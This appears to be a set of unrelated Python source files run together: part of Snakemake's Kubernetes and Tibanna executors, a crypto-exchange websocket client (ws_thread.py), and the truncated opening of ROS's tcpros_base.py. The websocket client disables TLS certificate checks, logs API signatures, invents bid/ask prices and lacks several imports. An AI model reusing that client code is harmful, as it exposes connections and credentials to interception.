KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
# Sometimes, certain k8s requests throw kubernetes.client.rest.ApiException
# Solving this issue requires reauthentication, as _kubernetes_retry shows
# However, reauthentication itself, under rare conditions, may also throw
# errors such as:
# kubernetes.client.exceptions.ApiException: (409), Reason: Conflict
#
# This error doesn't mean anything wrong with the k8s cluster, and users can safely
# ignore it.
def _reauthenticate_and_retry(self, func=None):
import kubernetes
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("Trying to reauthenticate")
kubernetes.config.load_kube_config()
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
try:
self.register_secret()
except kubernetes.client.rest.ApiException as e:
if e.status == 409 and e.reason == "Conflict":
logger.warning("409 conflict ApiException when registering secrets")
logger.warning(e)
else:
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
if func:
return func()
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
return self._reauthenticate_and_retry(func)
# Handling timeout that may occur in case of GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
logger.info(
"Request time out! "
"check your connection to Kubernetes master"
"Workflow will pause for 5 minutes to allow any update operations to complete"
)
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
raise WorkflowError(
e,
"Error 111 connection timeout, please check"
" that the k8 cluster master is reachable!",
)
def _wait_for_jobs(self):
import kubernetes
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
func = lambda: self.safe_delete_pod(
j.jobid, ignore_not_found=True
)
self._kubernetes_retry(func)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
local_input=None,
restart_times=None,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.main_snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
exec_job = (
"snakemake {target} --snakefile {snakefile} "
"--force -j{cores} --keep-target-files --keep-remote "
"--latency-wait 0 --scheduler {workflow.scheduler_type} "
"--attempt 1 {use_threads} --max-inventory-time 0 "
"{overwrite_config} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_get_default_resources_args=True,
)
self.container_image = container_image or get_container_image()
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
def remove_prefix(self, s):
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
def handle_remote(self, target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
def add_command(self, job, tibanna_args, tibanna_config):
# snakefile, with file name remapped
snakefile_fname = tibanna_args.snakemake_main_filename
# targets, with file name remapped
targets = job.get_targets()
if not isinstance(targets, list):
targets = [targets]
targets_default = " ".join([self.handle_remote(t) for t in targets])
# use_threads
use_threads = "--force-use-threads" if not job.is_group() else ""
# format command
command = self.format_job_pattern(
self.exec_job,
job,
target=targets_default,
snakefile=snakefile_fname,
use_threads=use_threads,
cores=tibanna_config["cpu"],
)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
# input & output
# Local snakemake command here must be run with --default-remote-prefix
# and --default-remote-provider (forced) but on VM these options will be removed.
# The snakemake on the VM will consider these input and output as not remote.
# They files are transferred to the container by Tibanna before running snakemake.
# In short, the paths on VM must be consistent with what's in Snakefile.
# but the actual location of the files is on the S3 bucket/prefix.
# This mapping info must be passed to Tibanna.
for i in job.input:
logger.debug("job input " + str(i))
logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
# This is only needed if your backend does not allow to use callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
basedir,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- list of input files
output -- list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
# Determine whether to benchmark this process or do not
# benchmarking at all. We benchmark this process unless the
# execution is done through the ``shell:``, ``script:``, or
# ``wrapper:`` stanza.
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
basedir,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
basedir,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
basedir,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt in order to record an error in the
# scheduler but ignore it
raise e
except (Exception, BaseException) as ex:
log_verbose_traceback(ex)
# this ensures that exception can be re-raised in the parent thread
lineno, file = get_exception_origin(ex, linemaps)
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
|
ws_thread.py
|
import sys
import websocket
import threading
import traceback
import ssl
from time import sleep
import json
import decimal
import logging
from market_maker.settings import settings
from market_maker.auth.APIKeyAuth import generate_expires, generate_signature
from market_maker.auth.APIKeyAuthWithExpires import *
from market_maker.utils.log import setup_custom_logger
from market_maker.utils.math import toNearest
from future.utils import iteritems
from future.standard_library import hooks
with hooks(): # Python 2/3 compat
from urllib.parse import urlparse, urlunparse
# Connects to GTE websocket for streaming realtime data.
# The Marketmaker still interacts with this as if it were a REST Endpoint, but now it can get
# much more realtime data without heavily polling the API.
#
# The Websocket offers a bunch of data as raw properties right on the object.
# On connect, it synchronously asks for a push of all this data then returns.
# Right after, the MM can start using its data. It will be updated in realtime, so the MM can
# poll as often as it wants.
class GTEWebsocket():
# Don't grow a table larger than this amount. Helps cap memory usage.
MAX_TABLE_LEN = 200
def __init__(self):
self.logger = logging.getLogger('root')
self.__reset()
self.data = {} #客户端维护的数据结构,完全不是消息体的 raw 数据
self.ws_url = settings.WS_URL
self.keys = {}
def __del__(self):
self.exit()
# We run one symbol at a process.
# So no need to cover multiple instrument type/assets/symbols
def connect(self, endpoint="", shouldAuth=True):
'''Connect to the websocket and initialize data stores.'''
self.logger.debug("Connecting GTE WebSocket.")
self.shouldAuth = shouldAuth
wsURL = self.ws_url
self.logger.info("Connecting to %s" % wsURL)
self.__connect(wsURL) # auth信息放在http header里面了
self.logger.info('Connected to WS. Now to subscribe some sample data')
# 我们约定单个进程不能跨货币区、跨品种;否则计算起来太麻烦
# 如果想多交易区、多品种交易,就运行多个进程。
sub_settle_currencys = 'BTC'
instrument_type = 'pc'
sub_symbols = ['BTC_USD'] #打算订阅/交易的品种
for symbol in sub_symbols:
args = {
"instrument_type":instrument_type,
"table":"instrument",
"settle_currency":sub_settle_currencys,
"symbol":symbol
}
self.__send_command('sub',args)
args = {
"instrument_type":instrument_type,
"table":"trade",
"settle_currency":sub_settle_currencys,
"symbol":symbol
}
self.__send_command('sub',args)
args = {
"instrument_type":instrument_type,
"table":"order_book",
"settle_currency":sub_settle_currencys,
"symbol":symbol
}
self.__send_command('sub',args)
# Connected. Wait for partials
# 确保收到第一条partial消息之后才完成初始化
self.__wait_for_symbol(symbol)
self.shouldAuth = True
if self.shouldAuth:
# ws 命令方式auth
expires = int(round(time.time()) + 60)*1000 # 60s grace period in case of clock skew
message = "GET/ws" + str(expires)
signature = hmac.new(bytes(settings.API_SECRET, 'utf8'), bytes(message, 'utf8'), digestmod=hashlib.sha256).hexdigest()
args = {
"api_key" : settings.API_KEY,
"expires" : str(expires),
"signature" : signature
}
self.logger.info('expires:'+ str(expires))
self.logger.info('expmessage:'+ message)
self.logger.info('signature:'+ signature)
self.__send_command('auth_key_expires',args)
# 订阅账户信息
args = {
"instrument_type":settings.INSTRUMENTTYPE,
"table":"order",
"settle_currency":settings.SETTLECURRENCY,
"symbol":settings.SYMBOL
}
self.__send_command('sub',args)
args = {
"instrument_type":settings.INSTRUMENTTYPE,
"table":"execution",
"settle_currency":settings.SETTLECURRENCY,
"symbol":settings.SYMBOL
}
self.__send_command('sub',args)
args = {
"instrument_type":settings.INSTRUMENTTYPE,
"table":"position",
"settle_currency":settings.SETTLECURRENCY,
"symbol":settings.SYMBOL
}
self.__send_command('sub',args)
self.__wait_for_account()
self.logger.info('Got sample market data. Starting.')
#
# Data methods
#
def get_instrument(self, symbol):
#self.logger.info(list(self.data.keys()))
instruments = self.data['instrument']
#self.logger.info(instruments)
matchingInstruments = [i for i in instruments if i['symbol'] == symbol]
if len(matchingInstruments) == 0:
raise Exception("Unable to find instrument or index with symbol: " + symbol)
instrument = matchingInstruments[0]
# Turn the 'tickSize' into 'tickLog' for use in rounding
# http://stackoverflow.com/a/6190291/832202
instrument['tickLog'] = decimal.Decimal(str(instrument['tick_size'])).as_tuple().exponent * -1
return instrument
def get_ticker(self, symbol):
'''Return a ticker object. Generated from instrument.'''
instrument = self.get_instrument(symbol)
# If this is an index, we have to get the data from the last trade.
if instrument['symbol'][0] == '.':
ticker = {}
ticker['mid'] = ticker['buy'] = ticker['sell'] = ticker['last'] = instrument['markPrice']
# Normal instrument
else:
# 我们先fake一点数据
bid = float(instrument['last_price']) - 5
ask = float(instrument['last_price']) + 2.5
'''
bid = instrument['bidPrice'] or instrument['last_price']
ask = instrument['askPrice'] or instrument['last_price']
'''
ticker = {
"last": instrument['last_price'],
"buy": bid,
"sell": ask,
"mid": (bid + ask) / 2
}
# The instrument has a tickSize. Use it to round values.
#return {k: toNearest(float(v or 0), instrument['tickSize']) for k, v in iteritems(ticker)}
return {k: toNearest(float(v or 0), 0.5) for k, v in iteritems(ticker)}
def funds(self):
return self.data['margin'][0]
def market_depth(self, symbol):
raise NotImplementedError('orderBook is not subscribed; use askPrice and bidPrice on instrument')
# return self.data['orderBook25'][0]
def open_orders(self, clOrdIDPrefix):
orders = self.data['order']
# Filter to only open orders (leavesQty > 0) and those that we actually placed
return [o for o in orders if str(o['clOrdID']).startswith(clOrdIDPrefix) and o['leavesQty'] > 0]
# 返回指定结算区、指定工具类型、指定symbol的全部仓位
# 返回结果是数组
def position(self,instrument_type, settle_currency,symbol):
positions = self.data['position']
pos = [p for p in positions if p['instrument_type'] == instrument_type and p['settle_currency'] == settle_currency and p['symbol'] == symbol ]
if len(pos) == 0:
# No position found; stub it
#return {'avgCostPrice': 0, 'avgEntryPrice': 0, 'currentQty': 0, 'symbol': symbol}
pass
return pos
def recent_trades(self):
return self.data['trade']
#
# Lifecycle methods
#
def error(self, err):
self._error = err
self.logger.error(err)
self.exit()
def exit(self):
self.exited = True
self.ws.close()
#
# Private methods
#
def __connect(self, wsURL):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
ssl_defaults = ssl.get_default_verify_paths()
sslopt_ca_certs = {'ca_certs': ssl_defaults.cafile}
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error,
header=self.__get_auth()
)
setup_custom_logger('websocket', log_level=settings.LOG_LEVEL)
#self.wst = threading.Thread(target=lambda: self.ws.run_forever(sslopt=sslopt_ca_certs)) #需要ssl验证
self.wst = threading.Thread(target=lambda: self.ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})) #不要ssl验证
self.wst.daemon = True
self.wst.start()
self.logger.info("Started thread")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
self.logger.error("Couldn't connect to WS! Exiting.")
self.exit()
sys.exit(1)
def __get_auth(self):
'''Return auth headers. Will use API Keys if present in settings.'''
if self.shouldAuth is False:
return []
self.logger.info("Authenticating with API Key.")
# To auth to the WS using an API key, we generate a signature of a nonce and
# the WS API endpoint.
nonce = generate_expires()
return [
"api-expires: " + str(nonce),
"api-signature: " + generate_signature(settings.API_SECRET, 'GET', '/realtime', nonce, ''),
"api-key:" + settings.API_KEY
]
def __wait_for_account(self):
'''On subscribe, this data will come down. Wait for it.'''
# Wait for the keys to show up from the ws
# while not {'margin', 'position', 'order'} <= set(self.data):
while not { 'position', 'order'} <= set(self.data): # 暂时没有'margin',
sleep(0.1)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
while not {'instrument', 'order_book'} <= set(self.data):
sleep(0.1)
# 需要 command args 两个参数,后两个可以为空
def __send_command(self, command, args=None):
'''Send a raw command.'''
self.logger.debug(json.dumps({"op": command, "args": args or ""}))
self.ws.send(json.dumps({"op": command, "args": args or ""}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
#self.logger.info(json.dumps(message))
if 'status' in message: # 是状态类消息
if message['status'] == 400:
self.error(message['error'])
elif message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
else:
pass
return
elif 'data' in message: # 是数据消息
table = message['table'] if 'table' in message else None # 主题
action = message['action'] if 'action' in message else None
if not action:
self.logger.info(json.dumps(message))
if table not in self.data: # 例如 orderbookL2还没有
self.data[table] = []
if table not in self.keys:
self.keys[table] = []
# There are four possible actions from the WS:
# 'partial' - full table image
# 'insert' - new row
# 'update' - update row
# 'delete' - delete row
if action == 'partial':
self.logger.debug("%s: partial" % table)
self.data[table] += message['data']
# Keys are communicated on partials to let you know how to uniquely identify
# an item. We use it for updates.
#self.keys[table] = message['data']['keys'] # self.keys[table] 存贮每个主题唯一识别字段
# 现在我们手动赋值
self.keys['instument'] = ['settle_currency','asset_class','symbol']
self.keys['trade'] = ['settle_currency','asset_class','symbol']
self.keys['order_book'] = ['id']
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, message['data']))
self.data[table] += message['data']
# Limit the max length of the table to avoid excessive memory usage.
# Don't trim orders because we'll lose valuable state if we do.
if table not in ['order_book'] and len(self.data[table]) > GTEWebsocket.MAX_TABLE_LEN:
self.data[table] = self.data[table][(GTEWebsocket.MAX_TABLE_LEN // 2):]
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, message['data']))
# Locate the item in the collection and update it.
for updateData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], updateData)
if not item:
self.logger.debug('updating data %s not found in %s' % ( updateData,table))
continue # No item found to update. Could happen before push
# Log executions
if table == 'order':
is_canceled = 'ordStatus' in updateData and updateData['ordStatus'] == 'Canceled'
if 'cumQty' in updateData and not is_canceled:
contExecuted = updateData['cumQty'] - item['cumQty']
if contExecuted > 0:
instrument = self.get_instrument(item['symbol'])
self.logger.info("Execution: %s %d Contracts of %s at %.*f" %
(item['side'], contExecuted, item['symbol'],
instrument['tickLog'], item['price']))
# Update this item.
item.update(updateData)
# Remove canceled / filled orders
if table == 'order' and item['leavesQty'] <= 0:
self.data[table].remove(item)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, message['data']))
# Locate the item in the collection and remove it.
for deleteData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], deleteData)
self.data[table].remove(item)
else:
raise Exception("Unknown action: %s" % action)
def __on_open(self):
self.logger.info("Websocket Opened.")
def __on_close(self):
self.logger.info('Websocket Closed')
self.exit()
def __on_error(self, ws, error):
if not self.exited:
self.error(error)
def __reset(self):
self.data = {}
self.keys = {}
self.exited = False
self._error = None
# keys:['symbol','id']
# table: self.data['orderbook'] 整个交易所所有的品种;
# matchData: message['data']['rows']的一个item
def findItemByKeys(keys, table, matchData):
for item in table:
matched = True
for key in keys:
if item[key] != matchData[key]:
matched = False
if matched:
return item
if __name__ == "__main__":
# create console handler and set level to debug
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
# create formatter
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
# add formatter to ch
ch.setFormatter(formatter)
logger.addHandler(ch)
ws = GTEWebsocket()
ws.logger = logger
ws.connect("wss://td.gte.io")
while(ws.ws.sock.connected):
sleep(1)
|
tcpros_base.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Revision $Id$
"""Internal use: common TCPROS libraries"""
try:
from cStringIO import StringIO #Python 2.x
python3 = 0
except ImportError:
from io import StringIO, BytesIO #Python 3.x
python3 = 1
import socket
import logging
import threading
import time
import traceback
import select
import rosgraph
import rosgraph.network
from genpy import DeserializationError, Message
from rosgraph.network import read_ros_handshake_header, write_ros_handshake_header
# TODO: remove * import from core
from rospy.core import *
from rospy.core import logwarn, loginfo, logerr, logdebug, rospydebug, rospyerr, rospywarn
from rospy.exceptions import ROSInternalException, TransportException, TransportTerminated, TransportInitError
from rospy.msg import deserialize_messages, serialize_message
from rospy.service import ServiceException
from rospy.impl.transport import Transport, BIDIRECTIONAL
logger = logging.getLogger('rospy.tcpros')
# Receive buffer size for topics/services (in bytes)
DEFAULT_BUFF_SIZE = 65536
## name of our customized TCP protocol for accepting flows over server socket
TCPROS = "TCPROS"
_PARAM_TCP_KEEPALIVE = '/tcp_keepalive'
_use_tcp_keepalive = None
_use_tcp_keepalive_lock = threading.Lock()
def _is_use_tcp_keepalive():
global _use_tcp_keepalive
if _use_tcp_keepalive is not None:
return _use_tcp_keepalive
with _use_tcp_keepalive_lock:
if _use_tcp_keepalive is not None:
return _use_tcp_keepalive
# in order to prevent circular dependencies, this does not use the
# builtin libraries for interacting with the parameter server
m = rospy.core.xmlrpcapi(rosgraph.get_master_uri())
code, msg, val = m.getParam(rospy.names.get_caller_id(), _PARAM_TCP_KEEPALIVE)
_use_tcp_keepalive = val if code == 1 else True
return _use_tcp_keepalive
def recv_buff(sock, b, buff_size):
"""
Read data from socket into buffer.
@param sock: socket to read from
@type sock: socket.socket
@param b: buffer to receive into
@type b: StringIO
@param buff_size: recv read size
@type buff_size: int
@return: number of bytes read
@rtype: int
"""
d = sock.recv(buff_size)
if d:
b.write(d)
return len(d)
else: #bomb out
raise TransportTerminated("unable to receive data from sender, check sender's logs for details")
class TCPServer(object):
"""
Simple server that accepts inbound TCP/IP connections and hands
them off to a handler function. TCPServer obeys the
ROS_IP/ROS_HOSTNAME environment variables
"""
def __init__(self, inbound_handler, port=0):
"""
Setup a server socket listening on the specified port. If the
port is omitted, will choose any open port.
@param inbound_handler: handler to invoke with
new connection
@type inbound_handler: fn(sock, addr)
@param port: port to bind to, omit/0 to bind to any
@type port: int
"""
self.port = port #will get overwritten if port=0
self.addr = None #set at socket bind
self.is_shutdown = False
self.inbound_handler = inbound_handler
try:
self.server_sock = self._create_server_sock()
except:
self.server_sock = None
raise
def start(self):
"""Runs the run() loop in a separate thread"""
t = threading.Thread(target=self.run, args=())
t.setDaemon(True)
t.start()
def run(self):
"""
Main TCP receive loop. Should be run in a separate thread -- use start()
to do this automatically.
"""
self.is_shutdown = False
if not self.server_sock:
raise ROSInternalException("%s did not connect"%self.__class__.__name__)
while not self.is_shutdown:
try:
(client_sock, client_addr) = self.server_sock.accept()
except socket.timeout:
continue
except IOError as e:
(errno, msg) = e.args
if errno == 4: #interrupted system call
continue
raise
if self.is_shutdown:
break
try:
#leave threading decisions up to inbound_handler
